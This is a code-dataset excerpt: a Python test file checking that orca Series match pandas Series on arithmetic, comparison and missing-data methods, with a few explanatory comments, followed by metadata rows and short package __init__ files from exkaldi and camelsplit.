c2 = os.rdiv(1).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rdiv_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps.rdiv([1, 2, 12, 10])
c2 = os.rdiv([1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rdiv_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
# default axis=0
c1 = ps.rdiv(psb)
c2 = os.rdiv(osb).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=0
c1 = ps.rdiv(psb, axis=0)
c2 = os.rdiv(osb).to_pandas()  # axis omitted for orca (see radd axis=0 TODO above)
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=1, ValueError expected
# TODO: orca.Series.rdiv(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.rdiv(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.rdiv(osb, axis=1)
def test_series_binary_operator_function_rtruediv_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps.rtruediv(1)
c2 = os.rtruediv(1).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rtruediv_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps.rtruediv([1, 2, 12, 10])
c2 = os.rtruediv([1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rtruediv_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
# default axis=0
c1 = ps.rtruediv(psb)
c2 = os.rtruediv(osb).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=0
c1 = ps.rtruediv(psb, axis=0)
c2 = os.rtruediv(osb).to_pandas()  # axis omitted for orca (see radd axis=0 TODO above)
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=1, ValueError expected
# TODO: orca.Series.rtruediv(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.rtruediv(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.rtruediv(osb, axis=1)
def test_series_binary_operator_function_rfloordiv_scalar(self):
# TODO: results differ for negative numbers
# ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
# os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
ps = pd.Series([10, 1, 19, 5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, 5], index=['a', 'b', 'c', 'd'])
c1 = ps.rfloordiv(1)
c2 = os.rfloordiv(1).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
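# A plausible source of the negative-number discrepancy noted above: Python and
# pandas floor division rounds toward negative infinity, while many database
# engines truncate toward zero. The two conventions only disagree when the
# quotient is negative:

```python
floor_result = -5 // 2        # Python/pandas: rounds down to -3
trunc_result = int(-5 / 2)    # truncation toward zero: -2
assert floor_result == -3
assert trunc_result == -2
# the conventions agree for non-negative quotients
assert 5 // 2 == int(5 / 2)
```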
def test_series_binary_operator_function_rfloordiv_list(self):
# TODO: results differ for negative numbers
# ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
# os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
ps = pd.Series([10, 1, 19, 5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, 5], index=['a', 'b', 'c', 'd'])
c1 = ps.rfloordiv([1, 2, 12, 10])
c2 = os.rfloordiv([1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rfloordiv_series(self):
# TODO: results differ for negative numbers
# ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
# os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
ps = pd.Series([10, 1, 19, 5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, 5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
# default axis=0
c1 = ps.rfloordiv(psb)
c2 = os.rfloordiv(osb).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=0
c1 = ps.rfloordiv(psb, axis=0)
c2 = os.rfloordiv(osb).to_pandas()  # axis omitted for orca (see radd axis=0 TODO above)
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=1, ValueError expected
# TODO: orca.Series.rfloordiv(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.rfloordiv(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.rfloordiv(osb, axis=1)
def test_series_binary_operator_function_rmod_scalar(self):
# TODO: results differ for negative numbers
# ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
# os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
ps = pd.Series([10, 1, 19, 5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, 5], index=['a', 'b', 'c', 'd'])
c1 = ps.rmod(1)
c2 = os.rmod(1).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rmod_list(self):
# TODO: results differ for negative numbers
# ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
# os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
ps = pd.Series([10, 1, 19, 5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, 5], index=['a', 'b', 'c', 'd'])
c1 = ps.rmod([1, 2, 12, 10])
c2 = os.rmod([1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rmod_series(self):
# TODO: results differ for negative numbers
# ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
# os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
ps = pd.Series([10, 1, 19, 5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, 5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
# default axis=0
c1 = ps.rmod(psb)
c2 = os.rmod(osb).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=0
c1 = ps.rmod(psb, axis=0)
c2 = os.rmod(osb).to_pandas()  # axis omitted for orca (see radd axis=0 TODO above)
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=1, ValueError expected
# TODO: orca.Series.rmod(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.rmod(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.rmod(osb, axis=1)
def test_series_binary_operator_function_rpow_scalar(self):
ps = pd.Series([10, 1, 9.0, 5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 9.0, 5], index=['a', 'b', 'c', 'd'])
c1 = ps.rpow(4)
c2 = os.rpow(4).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rpow_list(self):
ps = pd.Series([10, 1, 9.0, 5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 9.0, 5], index=['a', 'b', 'c', 'd'])
c1 = ps.rpow([1, 2, 12, 10])
c2 = os.rpow([1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rpow_series(self):
ps = pd.Series([10, 1, 9.0, 5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 9.0, 5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10.0, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10.0, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
# default axis=0
c1 = ps.rpow(psb)
c2 = os.rpow(osb).to_pandas()
assert_series_equal(c1, c2, check_dtype=False, check_less_precise=1)
# specify axis=0
c1 = ps.rpow(psb, axis=0)
c2 = os.rpow(osb).to_pandas()  # axis omitted for orca (see radd axis=0 TODO above)
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=1, ValueError expected
# TODO: orca.Series.rpow(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.rpow(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.rpow(osb, axis=1)
def test_series_binary_operator_function_combine(self):
ps1 = pd.Series({'falcon': 330.0, 'eagle': 160.0})
ps2 = pd.Series({'falcon': 345.0, 'eagle': 200.0, 'duck': 30.0})
os1 = orca.Series({'falcon': 330.0, 'eagle': 160.0})
os2 = orca.Series({'falcon': 345.0, 'eagle': 200.0, 'duck': 30.0})
# TODO: orca.Series().combine()
# c1 = ps1.combine(ps2, max)
# c2 = os1.combine(os2, max).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_combine_first(self):
ps1 = pd.Series([1, np.nan])
ps2 = pd.Series([3, 4])
os1 = orca.Series([1, np.nan])
os2 = orca.Series([3, 4])
# TODO: orca.Series().combine_first()
# c1 = ps1.combine_first(ps2)
# c2 = os1.combine_first(os2).to_pandas()
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_round(self):
ps = pd.Series([0.1, 1.3, 2.7])
os = orca.Series([0.1, 1.3, 2.7])
# TODO: orca.Series().round()
c1 = ps.round(1)
c2 = os.round(1)
assert_series_equal(c1, c2.to_pandas())
pser = pd.Series([0.028208, 0.038683, 0.877076], name='x')
oser = orca.Series(pser)
# TODO: TypeError expected: integer argument expected, got float
# msg = "integer argument expected, got float"
# with self.assertRaisesRegex(TypeError, msg):
# pser.round(1.5)
# with self.assertRaisesRegex(TypeError, msg):
# oser.round(1.5)
@property
def psla(self):
return pd.Series({'dog': 1, 'cat': 2, 'pig': 3, 'cow': 4}, index=['dog', 'cat', 'pig', 'cow'])
@property
def pslb(self):
return pd.Series({'dog': 1, 'cat': 3, 'pig': 2, 'cow': 5}, index=['dog', 'cat', 'pig', 'cow'])
@property
def osla(self):
return orca.Series({'dog': 1, 'cat': 2, 'pig': 3, 'cow': 4}, index=['dog', 'cat', 'pig', 'cow'])
@property
def oslb(self):
return orca.Series({'dog': 1, 'cat': 3, 'pig': 2, 'cow': 5}, index=['dog', 'cat', 'pig', 'cow'])
def test_series_binary_operator_function_lt(self):
# other = scalar value
pc1 = self.psla.lt(3)
oc1 = self.osla.lt(3).to_pandas()
assert_series_equal(pc1, oc1)
# other = Series
pc2 = self.psla.lt(self.pslb)
oc2 = self.osla.lt(self.oslb).to_pandas()
assert_series_equal(pc2, oc2)
def test_series_binary_operator_function_gt(self):
# other = scalar value
pc1 = self.psla.gt(3)
oc1 = self.osla.gt(3).to_pandas()
assert_series_equal(pc1, oc1)
# other = Series
pc2 = self.psla.gt(self.pslb)
oc2 = self.osla.gt(self.oslb).to_pandas()
assert_series_equal(pc2, oc2)
def test_series_binary_operator_function_le(self):
# other = scalar value
pc1 = self.psla.le(3)
oc1 = self.osla.le(3).to_pandas()
assert_series_equal(pc1, oc1)
# other = Series
pc2 = self.psla.le(self.pslb)
oc2 = self.osla.le(self.oslb).to_pandas()
assert_series_equal(pc2, oc2)
def test_series_binary_operator_function_ge(self):
# other = scalar value
pc1 = self.psla.ge(3)
oc1 = self.osla.ge(3).to_pandas()
assert_series_equal(pc1, oc1)
# other = Series
pc2 = self.psla.ge(self.pslb)
oc2 = self.osla.ge(self.oslb).to_pandas()
assert_series_equal(pc2, oc2)
def test_series_binary_operator_function_ne(self):
# other = scalar value
pc1 = self.psla.ne(3)
oc1 = self.osla.ne(3).to_pandas()
assert_series_equal(pc1, oc1)
# other = Series
pc2 = self.psla.ne(self.pslb)
oc2 = self.osla.ne(self.oslb).to_pandas()
assert_series_equal(pc2, oc2)
def test_series_binary_operator_function_eq(self):
# other = scalar value
pc1 = self.psla.eq(3)
oc1 = self.osla.eq(3).to_pandas()
assert_series_equal(pc1, oc1)
# other = Series
pc2 = self.psla.eq(self.pslb)
oc2 = self.osla.eq(self.oslb).to_pandas()
assert_series_equal(pc2, oc2)
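# The comparison methods exercised above are the functional form of the
# comparison operators: s.eq(x) matches s == x elementwise. A standalone
# pandas sketch using the same kind of fixture:

```python
import pandas as pd

s = pd.Series({'dog': 1, 'cat': 2, 'pig': 3})
# method form and operator form produce the same boolean mask
assert (s.eq(3) == (s == 3)).all()
assert list(s.eq(3)) == [False, False, True]
```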
def test_series_binary_operator_function_product(self):
# TODO: orca.Series().prod()
pc1 = pd.Series([1]).prod()
# oc1 = orca.Series([1]).prod()
# self.assertEqual(pc1, oc1)  # prod() returns a scalar, not a series
#
# pc2 = pd.Series([]).prod()
# oc2 = orca.Series([]).prod()
# self.assertEqual(pc2, oc2)
#
# pc3 = pd.Series([np.nan]).prod()
# oc3 = orca.Series([np.nan]).prod()
# self.assertTrue(np.isnan(pc3) == np.isnan(oc3))
def test_series_binary_operator_function_dot(self):
ps = pd.Series([0, 1, 2, 3])
psother = pd.Series([-1, 2, -3, 4])
os = orca.Series([0, 1, 2, 3])
osother = orca.Series([-1, 2, -3, 4])
# TODO: orca.Series().dot()
# # dot with series
# pc1 = ps.dot(psother)
# pc2 = ps @ psother
# oc1 = os.dot(osother)
# oc2 = os @ osother
# assert_series_equal(pc1, oc1)
# assert_series_equal(pc2, oc2)
#
# # dot with dataframe
# pdfn = pd.DataFrame([[0, 1], [-2, 3], [4, -5], [6, 7]])
# odfn = orca.DataFrame([[0, 1], [-2, 3], [4, -5], [6, 7]])
# pc1 = ps.dot(pdfn)
# pc2 = ps @ pdfn
# oc1 = os.dot(odfn)
# oc2 = os @ odfn
# assert_series_equal(pc1, oc1)
# assert_series_equal(pc2, oc2)
#
# # dot with array
# arr = np.array([[0, 1], [-2, 3], [4, -5], [6, 7]])
# pc1 = ps.dot(arr)
# pc2 = ps @ arr
# oc1 = os.dot(arr)
# oc2 = os @ arr
# assert_series_equal(pc1, oc1)
# assert_series_equal(pc2, oc2)
def test_series_function_application_groupby_window_ewm(self):
ewmp = self.ps.ewm(com=0.5)
ewmo = self.os.ewm(com=0.5)
assert_series_equal(ewmp.mean(), ewmo.mean().to_pandas())
assert_series_equal(ewmp.std(), ewmo.std().to_pandas())
assert_series_equal(ewmp.var(), ewmo.var().to_pandas())
# TODO: pairwise
# assert_series_equal(ewmp.corr(), ewmo.corr().to_pandas())
# assert_series_equal(ewmp.cov(), ewmo.cov().to_pandas())
ewmp = self.ps.ewm(span=5)
ewmo = self.os.ewm(span=5)
assert_series_equal(ewmp.mean(), ewmo.mean().to_pandas())
assert_series_equal(ewmp.std(), ewmo.std().to_pandas())
assert_series_equal(ewmp.var(), ewmo.var().to_pandas())
ewmp = self.ps.ewm(halflife=7)
ewmo = self.os.ewm(halflife=7)
assert_series_equal(ewmp.mean(), ewmo.mean().to_pandas())
assert_series_equal(ewmp.std(), ewmo.std().to_pandas())
assert_series_equal(ewmp.var(), ewmo.var().to_pandas())
ewmp = self.ps.ewm(alpha=0.2)
ewmo = self.os.ewm(alpha=0.2)
assert_series_equal(ewmp.mean(), ewmo.mean().to_pandas())
assert_series_equal(ewmp.std(), ewmo.std().to_pandas())
assert_series_equal(ewmp.var(), ewmo.var().to_pandas())
ewmp = self.ps.ewm(alpha=0.7, min_periods=2, adjust=False, ignore_na=True)
ewmo = self.os.ewm(alpha=0.7, min_periods=2, adjust=False, ignore_na=True)
assert_series_equal(ewmp.mean(), ewmo.mean().to_pandas())
assert_series_equal(ewmp.std(), ewmo.std().to_pandas())
assert_series_equal(ewmp.var(), ewmo.var().to_pandas())
def test_series_missing_data_handling_fillna(self):
ps = pd.Series([np.nan, 2, 3, 4, np.nan, 6], name='x')
os = orca.Series(ps).to_pandas()
self.assertEqual(repr(os.fillna(0)), repr(ps.fillna(0)))
os.fillna(0, inplace=True)
ps.fillna(0, inplace=True)
assert_series_equal(os, ps)
def test_series_missing_data_handling_dropna(self):
ps = pd.Series([np.nan, 2, 3, 4, np.nan, 6], name='x')
os = orca.Series(ps)
# TODO: NOT IMPLEMENTED
# assert_series_equal(os.dropna().to_pandas(), ps.dropna())
#
# os.dropna(inplace=True)
# assert_series_equal(os.to_pandas(), ps.dropna())
def test_series_missing_data_handling_isnull(self):
ps = pd.Series([1, 2, 3, 4, np.nan, 6], name='x')
os = orca.Series(ps)
self.assertEqual(repr(os.notnull().to_pandas()), repr(ps.notnull()))
self.assertEqual(repr(os.isnull().to_pandas()), repr(ps.isnull()))
ps = self.ps
os = self.os
self.assertEqual(repr(os.notnull().to_pandas()), repr(ps.notnull()))
self.assertEqual(repr(os.isnull().to_pandas()), repr(ps.isnull()))
def test_series_reshaping_sorting_sort_values(self):
ps = pd.Series([1, 2, 3, 4, 5, None, 7], name='0')
os = orca.Series([1, 2, 3, 4, 5, None, 7], name='0')
# TODO: orca.Series object has no attribute 'sort_values'
# self.assertEqual(repr(os.sort_values()), repr(ps.sort_values()))
# self.assertEqual(repr(os.sort_values(ascending=False)),
# repr(ps.sort_values(ascending=False)))
# self.assertEqual(repr(os.sort_values(na_position='first')),
# repr(ps.sort_values(na_position='first')))
# self.assertRaises(ValueError, lambda: os.sort_values(na_position='invalid'))
# self.assertEqual(os.sort_values(inplace=True), ps.sort_values(inplace=True))
# assert_series_equal(os, ps)
def test_series_combining_joining_merging_append(self):
ps1 = pd.Series([1, 2, 3], name='0')
ps2 = pd.Series([4, 5, 6], name='0')
ps3 = pd.Series([4, 5, 6], index=[3, 4, 5], name='0')
os1 = orca.Series(ps1)
os2 = orca.Series(ps2)
os3 = orca.Series(ps3)
# TODO: NOT IMPLEMENTED
# os1 = os1.append(os2)
# ps1 = ps1.append(ps2)
# ps1.equals(os1)
# self.assertTrue(ps1.equals(os1))
# os1 = os1.append(os3)
# ps1 = ps1.append(ps3)
# self.assertTrue(ps1.equals(os1))
# os1 = os1.append(os2, ignore_index=True)
# ps1 = ps1.append(ps2, ignore_index=True)
# self.assertTrue(ps1.equals(os1))
#
# os1.append(os3, verify_integrity=True)
# msg = "Indices have overlapping values"
# with self.assertRaises(ValueError, msg=msg):
# os1.append(os2, verify_integrity=True)
# def test_series_map(self):
# pser = pd.Series(['cat', 'dog', None, 'rabbit'])
# oser = orca.DataFrame(pser)
# # Currently orca doesn't return NaN as Pandas does.
# self.assertEqual(
# repr(oser.map({})),
# repr(pser.map({}).replace({pd.np.nan: None}).rename(0)))
#
# d = defaultdict(lambda: "abc")
# self.assertTrue("abc" in repr(oser.map(d)))
# self.assertEqual(
# repr(oser.map(d)),
# repr(pser.map(d).rename(0)))
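The comparison pattern used throughout these tests — compute with pandas, compute with orca, convert back with to_pandas(), and compare — rests on pandas' own testing helper. A minimal pandas-only sketch of the operator-method checks (no orca required):

```python
import pandas as pd
from pandas.testing import assert_series_equal

a = pd.Series([1, 2, 3])
b = pd.Series([3, 2, 1])

# named operator methods, as exercised in the tests above
lt = a.lt(b)   # elementwise a < b, other = Series
ge = a.ge(2)   # elementwise a >= 2, other = scalar value

# each named method is equivalent to the corresponding operator
assert_series_equal(lt, a < b)
assert_series_equal(ge, a >= 2)
```

assert_series_equal raises AssertionError on any mismatch in values, dtype, or index, which is why the orca results must be converted with to_pandas() before comparison.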
| 41.51134 | 116 | 0.523353 | 9,049 | 60,399 | 3.376064 | 0.031495 | 0.062193 | 0.017774 | 0.019771 | 0.876301 | 0.845041 | 0.809755 | 0.791195 | 0.78275 | 0.731588 | 0 | 0.076446 | 0.270567 | 60,399 | 1,454 | 117 | 41.53989 | 0.616973 | 0.227338 | 0 | 0.5 | 0 | 0 | 0.048614 | 0 | 0 | 0 | 0 | 0.000688 | 0.167506 | 1 | 0.117128 | false | 0 | 0.006297 | 0.010076 | 0.138539 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6ef6e28e42fcf422390698ce89a082fcc6870fd8 | 2,120 | py | Python | exkaldi/core/__init__.py | ikou-austin/exkaldi | 437dd8a121baf8e682850374df3eade5ae53fda4 | [
"Apache-2.0"
] | 1 | 2020-10-14T13:55:53.000Z | 2020-10-14T13:55:53.000Z | exkaldi/core/__init__.py | ikou-austin/exkaldi | 437dd8a121baf8e682850374df3eade5ae53fda4 | [
"Apache-2.0"
] | null | null | null | exkaldi/core/__init__.py | ikou-austin/exkaldi | 437dd8a121baf8e682850374df3eade5ae53fda4 | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import
from exkaldi.core.archive import ListTable
from exkaldi.core.archive import ArkIndexTable
from exkaldi.core.archive import Transcription
from exkaldi.core.archive import Metric
from exkaldi.core.archive import WavSegment
from exkaldi.core.archive import BytesFeature
from exkaldi.core.archive import BytesCMVNStatistics
from exkaldi.core.archive import BytesProbability
from exkaldi.core.archive import BytesAlignmentTrans
from exkaldi.core.archive import BytesFmllrMatrix
from exkaldi.core.archive import NumpyFeature
from exkaldi.core.archive import NumpyCMVNStatistics
from exkaldi.core.archive import NumpyProbability
from exkaldi.core.archive import NumpyAlignment
from exkaldi.core.archive import NumpyAlignmentTrans
from exkaldi.core.archive import NumpyAlignmentPhone
from exkaldi.core.archive import NumpyAlignmentPdf
from exkaldi.core.archive import NumpyFmllrMatrix
from exkaldi.core.load import load_ali
from exkaldi.core.load import load_feat
from exkaldi.core.load import load_cmvn
from exkaldi.core.load import load_prob
from exkaldi.core.load import load_transcription
from exkaldi.core.load import load_list_table
from exkaldi.core.load import load_index_table
from exkaldi.core.feature import compute_mfcc
from exkaldi.core.feature import compute_fbank
from exkaldi.core.feature import compute_plp
from exkaldi.core.feature import compute_spectrogram
from exkaldi.core.feature import transform_feat
from exkaldi.core.feature import use_fmllr
from exkaldi.core.feature import use_cmvn
from exkaldi.core.feature import compute_cmvn_stats
from exkaldi.core.feature import use_cmvn_sliding
from exkaldi.core.feature import decompress_feat
from exkaldi.core.feature import add_delta
from exkaldi.core.feature import splice_feature
from exkaldi.core.common import tuple_dataset
from exkaldi.core.common import match_utterances
from exkaldi.core.common import merge_archives
from exkaldi.core.common import utt_to_spk
from exkaldi.core.common import spk_to_utt
from exkaldi.core.common import spk2utt_to_utt2spk
from exkaldi.core.common import utt2spk_to_spk2utt
| 40 | 52 | 0.870283 | 303 | 2,120 | 5.960396 | 0.19802 | 0.267996 | 0.365449 | 0.219269 | 0.715393 | 0.285161 | 0.03876 | 0 | 0 | 0 | 0 | 0.002069 | 0.088208 | 2,120 | 52 | 53 | 40.769231 | 0.93223 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3e28296b1c6e7ad3607aab1f1a8f5cf2cc1e25d0 | 43 | py | Python | camelsplit/__init__.py | flopp/camelsplit | 2383b3781e078f421b6f3ab58aca2d62bfb30c8b | [
"MIT"
] | 2 | 2020-02-09T16:05:53.000Z | 2021-05-18T08:29:36.000Z | camelsplit/__init__.py | flopp/camelsplit | 2383b3781e078f421b6f3ab58aca2d62bfb30c8b | [
"MIT"
] | null | null | null | camelsplit/__init__.py | flopp/camelsplit | 2383b3781e078f421b6f3ab58aca2d62bfb30c8b | [
"MIT"
] | null | null | null | from .camelsplit import camelsplit # noqa
| 21.5 | 42 | 0.790698 | 5 | 43 | 6.8 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162791 | 43 | 1 | 43 | 43 | 0.944444 | 0.093023 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3e4b013d4e831bc7045491b11998a3988ad9886a | 41 | py | Python | example_pkg_py/a2.py | Ar-Ray-code/rclpy_separate_example | 6514197537555460037ce35272fa48a0655467f8 | [
"Apache-2.0"
] | null | null | null | example_pkg_py/a2.py | Ar-Ray-code/rclpy_separate_example | 6514197537555460037ce35272fa48a0655467f8 | [
"Apache-2.0"
] | null | null | null | example_pkg_py/a2.py | Ar-Ray-code/rclpy_separate_example | 6514197537555460037ce35272fa48a0655467f8 | [
"Apache-2.0"
] | null | null | null | def hello2():
print("Hello! I'm A2.") | 20.5 | 27 | 0.560976 | 7 | 41 | 3.285714 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.060606 | 0.195122 | 41 | 2 | 27 | 20.5 | 0.636364 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0 | 0.5 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
